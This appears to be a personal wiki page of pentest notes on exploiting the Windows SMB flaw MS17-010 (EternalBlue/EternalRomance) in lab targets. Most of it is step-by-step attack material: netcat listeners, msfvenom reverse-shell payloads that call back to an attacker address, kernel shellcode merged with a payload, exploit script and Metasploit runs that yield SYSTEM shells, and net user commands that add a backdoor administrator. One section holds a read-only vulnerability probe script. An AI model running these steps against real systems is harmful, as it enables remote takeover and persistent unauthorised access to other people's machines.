ms17_010 _cve2017_0143
lethanhtung01011980 edited this page Apr 13, 2020 · 15 revisions
Installation steps:
- https://github.com/lethanhtung01011980/Notes/wiki/impacket_ms17_010
- Use send_and_execute.py in https://github.com/helviojunior/MS17-010
Create reverse shell listener:
- nc -nlvp 5678
Get System shell:
- cd MS17-010
- python send_and_execute.py victim_ip ../revShell-winx86_p5678.exe (revShell-winx86_p5678.exe is a 32-bit reverse-shell executable generated with msfvenom that connects back to the listener on port 5678; the exploit uploads it over SMB and runs it as SYSTEM)
Add admin user:
Ref:
- https://ivanitlearning.wordpress.com/2019/02/24/exploiting-ms17-010-without-metasploit-win-xp-sp3/
- https://null-byte.wonderhowto.com/how-to/manually-exploit-eternalblue-windows-server-using-ms17-010-python-exploit-0195414/
- Eternal Romance: https://www.exploit-db.com/exploits/43970
- Eternal Blue: https://www.exploit-db.com/exploits/42315
Ref: https://wiki.jacobshodd.com/writeups/hack-the-box/blue
- Use https://github.com/worawit/MS17-010
- Sample usage: https://github.com/worawit/MS17-010/blob/master/shellcode/eternalblue_sc_merge.py
This is for Windows 7 64-bit (eternalblue_exploit7.py). The kernel shellcode must come first in the payload file: it runs in the kernel and then launches whatever userland payload is appended after it. The addresses below are the lab values used in the writeup (10.10.10.40 = victim, 10.10.14.9 = attacker):
cd MS17-010/shellcode
nasm -f bin eternalblue_kshellcode_x64.asm -o eternalblue_kshellcode_x64.bin
msfvenom -p windows/x64/shell_reverse_tcp -f raw -o revshell64_10101040.bin EXITFUNC=thread LHOST=10.10.14.9 LPORT=6789
cat eternalblue_kshellcode_x64.bin revshell64_10101040.bin > 10.10.10.40.payload.bin
cd ..
nc -nlvp 6789 (in a separate terminal, before launching the exploit)
python eternalblue_exploit7.py 10.10.10.40 shellcode/10.10.10.40.payload.bin
- Got system shell
- Scan for the vulnerability with nmap (smb-vuln-ms17-010 is one of the scripts matched by the wildcard):
nmap -p 139,445 --script=smb-vuln* victim_ip
- msfconsole
- search ms17-010
Check whether the target is actually exploitable (this module runs a command on the target through the named-pipe technique, so a successful run confirms the host is vulnerable):
- use auxiliary/admin/smb/ms17_010_command
- set RHOSTS victim_ip
- run
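Both checks above rely on the same probe: after a null session to IPC$, an SMB_COM_TRANSACTION with the PeekNamedPipe subcommand and FID 0 is sent; an unpatched server answers STATUS_INSUFF_SERVER_RESOURCES (0xC0000205), a patched one rejects the bogus FID with STATUS_INVALID_HANDLE or STATUS_ACCESS_DENIED. The script below is an added example, not code from this wiki or from the nmap/Metasploit projects; it reimplements that probe with the standard library only. The target address passed on the command line and the sample response bytes are assumptions/constructed data.

```python
"""Minimal SMB1 probe for MS17-010: the PeekNamedPipe check used by the nmap
smb-vuln-ms17-010 script and the Metasploit smb_ms17_010 scanner, stdlib only."""
import socket
import struct

SMB_MAGIC = b"\xffSMB"
COM_NEGOTIATE, COM_SESSION_SETUP, COM_TREE_CONNECT, COM_TRANSACTION = 0x72, 0x73, 0x75, 0x25
TRANS_PEEK_NMPIPE = 0x0023
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205  # unpatched server's answer for FID 0
STATUS_INVALID_HANDLE = 0xC0000008           # patched: the bogus FID is rejected cleanly
STATUS_ACCESS_DENIED = 0xC0000022            # patched / hardened alternative


def smb_header(command, tid=0, uid=0, mid=1):
    """32-byte SMB1 header. Flags 0x18 = canonical, case-insensitive paths;
    Flags2 0x4001 = NT status codes + long names (ASCII strings, no Unicode)."""
    return SMB_MAGIC + struct.pack("<BIBHH8sHHHHH", command, 0, 0x18, 0x4001, 0,
                                   b"\x00" * 8, 0, tid, 0x2F4B, uid, mid)


def smb_packet(header, words, data):
    """WordCount / words / ByteCount / bytes, wrapped in a NetBIOS session header."""
    body = header + struct.pack("<B", len(words) // 2) + words + struct.pack("<H", len(data)) + data
    return b"\x00" + len(body).to_bytes(3, "big") + body


def negotiate_request():
    return smb_packet(smb_header(COM_NEGOTIATE), b"", b"\x02NT LM 0.12\x00")


def session_setup_request():
    """Null session: no password, empty account and domain.
    Capabilities 0x50 = CAP_NT_SMBS | CAP_STATUS32."""
    words = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0, 0xFFDF, 2, 1, 0, 0, 0, 0, 0x50)
    data = b"\x00\x00" + b"Unix\x00" + b"Samba\x00"  # account, domain, NativeOS, NativeLanMan
    return smb_packet(smb_header(COM_SESSION_SETUP), words, data)


def tree_connect_request(uid, target_ip):
    words = struct.pack("<BBHHH", 0xFF, 0, 0, 0, 1)  # no AndX, flags 0, 1-byte password
    data = b"\x00" + ("\\\\%s\\IPC$" % target_ip).encode() + b"\x00" + b"?????\x00"
    return smb_packet(smb_header(COM_TREE_CONNECT, uid=uid), words, data)


def peek_named_pipe_request(uid, tid):
    """SMB_COM_TRANSACTION, Setup = [TRANS_PEEK_NMPIPE, FID 0], no parameters or data."""
    name = b"\\PIPE\\\x00"
    offset = 32 + 1 + 32 + 2 + len(name)  # where the (empty) parameter block would start: 74
    words = struct.pack("<HHHHBBHIHHHHHBBHH",
                        0, 0, 0xFFFF, 0xFFFF,  # Total/Max parameter and data counts
                        0, 0, 0, 0, 0,         # MaxSetupCount, reserved, flags, timeout, reserved
                        0, offset, 0, offset,  # ParameterCount/Offset, DataCount/Offset
                        2, 0,                  # SetupCount, reserved
                        TRANS_PEEK_NMPIPE, 0)  # Setup[0] subcommand, Setup[1] = FID 0
    return smb_packet(smb_header(COM_TRANSACTION, tid=tid, uid=uid), words, name)


def parse_header(packet):
    """Return (command, nt_status, tid, uid) from a NetBIOS-framed SMB1 packet."""
    if len(packet) < 36 or packet[4:8] != SMB_MAGIC:
        raise ValueError("not an SMB1 packet")
    f = struct.unpack("<BIBHH8sHHHHH", packet[8:36])
    return f[0], f[1], f[7], f[9]


def classify(nt_status):
    if nt_status == STATUS_INSUFF_SERVER_RESOURCES:
        return "VULNERABLE"
    if nt_status in (STATUS_INVALID_HANDLE, STATUS_ACCESS_DENIED):
        return "PATCHED"
    return "UNKNOWN (status 0x%08X)" % nt_status


def recv_smb(sock):
    head = sock.recv(4)
    if len(head) < 4:
        raise ConnectionError("connection closed")
    length, body = int.from_bytes(head[1:4], "big"), b""
    while len(body) < length:
        chunk = sock.recv(length - len(body))
        if not chunk:
            raise ConnectionError("short SMB response")
        body += chunk
    return head + body


def check_ms17_010(target_ip, port=445, timeout=5.0):
    """Negotiate, null session, IPC$ tree connect, then the PeekNamedPipe probe."""
    with socket.create_connection((target_ip, port), timeout=timeout) as s:
        s.sendall(negotiate_request())
        recv_smb(s)
        s.sendall(session_setup_request())
        _, status, _, uid = parse_header(recv_smb(s))
        if status:
            return "UNKNOWN (null session refused, 0x%08X)" % status
        s.sendall(tree_connect_request(uid, target_ip))
        _, status, tid, _ = parse_header(recv_smb(s))
        if status:
            return "UNKNOWN (IPC$ tree connect failed, 0x%08X)" % status
        s.sendall(peek_named_pipe_request(uid, tid))
        return classify(parse_header(recv_smb(s))[1])


# Constructed sample (not a real capture): a Transaction response carrying
# STATUS_INSUFF_SERVER_RESOURCES with TID 0x0800 and UID 0x0801, for offline parsing.
SAMPLE_UNPATCHED_RESPONSE = (b"\x00\x00\x00\x20" + SMB_MAGIC + b"\x25" + b"\x05\x02\x00\xc0"
                             + b"\x98\x01\x40\x00\x00" + b"\x00" * 8 + b"\x00\x00"
                             + b"\x00\x08\x00\x00\x01\x08\x01\x00")


def demo():
    """Offline run of the parse + classify path on the constructed sample."""
    return classify(parse_header(SAMPLE_UNPATCHED_RESPONSE)[1])


if __name__ == "__main__":
    import sys
    print(check_ms17_010(sys.argv[1]) if len(sys.argv) > 1 else demo())
```

Run it as `python ms17_check.py victim_ip` against a lab host; without an argument it only exercises the parser on the constructed response. The probe is read-only (no transaction flooding, no pool grooming), so it is safe to run against hosts where the exploit itself would be too risky, which is why it makes a better pre-flight check than firing ms17_010_psexec blind.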
Exploit. If the exploit stalls with a LoginError/timeout, opening a dummy RDP connection to the target first can help:
- rdesktop victim_ip
Steps
- use exploit/windows/smb/ms17_010_psexec
- show options
- set RHOST victim_ip
- run
- getsystem (escalate; usually not needed, the session already runs as SYSTEM)
- getuid (show current privilege; optional)
- sessions 1 (only needed if the session was backgrounded)
- shell
- C:\WINNT\system32>net user newuser newpass /add
- C:\WINNT\system32>net localgroup administrators newuser /add
- rdesktop -u newuser -p newpass victim_ip (log in with the new admin user; as above, this also serves as the dummy RDP connection if the exploit times out with LoginError)
Sample output (Target OS "Windows 5.0" is Windows 2000, which matches the C:\WINNT prompt above):
- [*] Started reverse TCP handler on attacker_ip:4444
- [*] victim_ip:445 - Target OS: Windows 5.0
- [*] victim_ip:445 - Filling barrel with fish... done
- [*] victim_ip:445 - <---------------- | Entering Danger Zone | ---------------->
- [*] victim_ip:445 - [*] Preparing dynamite...
- [*] victim_ip:445 - [*] Trying stick 1 (x86)...Boom!
- [*] victim_ip:445 - [+] Successfully Leaked Transaction!
- [*] victim_ip:445 - [+] Successfully caught Fish-in-a-barrel
- [*] victim_ip:445 - <---------------- | Leaving Danger Zone | ---------------->
- [*] victim_ip:445 - Reading from CONNECTION struct at: 0x817e39f0
- [*] victim_ip:445 - Built a write-what-where primitive...
- [+] victim_ip:445 - Overwrite complete... SYSTEM session obtained!
- [*] victim_ip:445 - Selecting native target
- [*] victim_ip:445 - Uploading payload... BTVbzIuF.exe
- [*] victim_ip:445 - Created \BTVbzIuF.exe...
- [+] victim_ip:445 - Service started successfully...
- [*] Sending stage (179779 bytes) to victim_ip
- [*] victim_ip:445 - Deleting \BTVbzIuF.exe...
- [*] Meterpreter session 1 opened (attacker_ip:4444 -> victim_ip:1157) at 201x-xx-xx 01:15:31 -0400
Ref: https://null-byte.wonderhowto.com/how-to/exploit-eternalblue-windows-server-with-metasploit-0195413/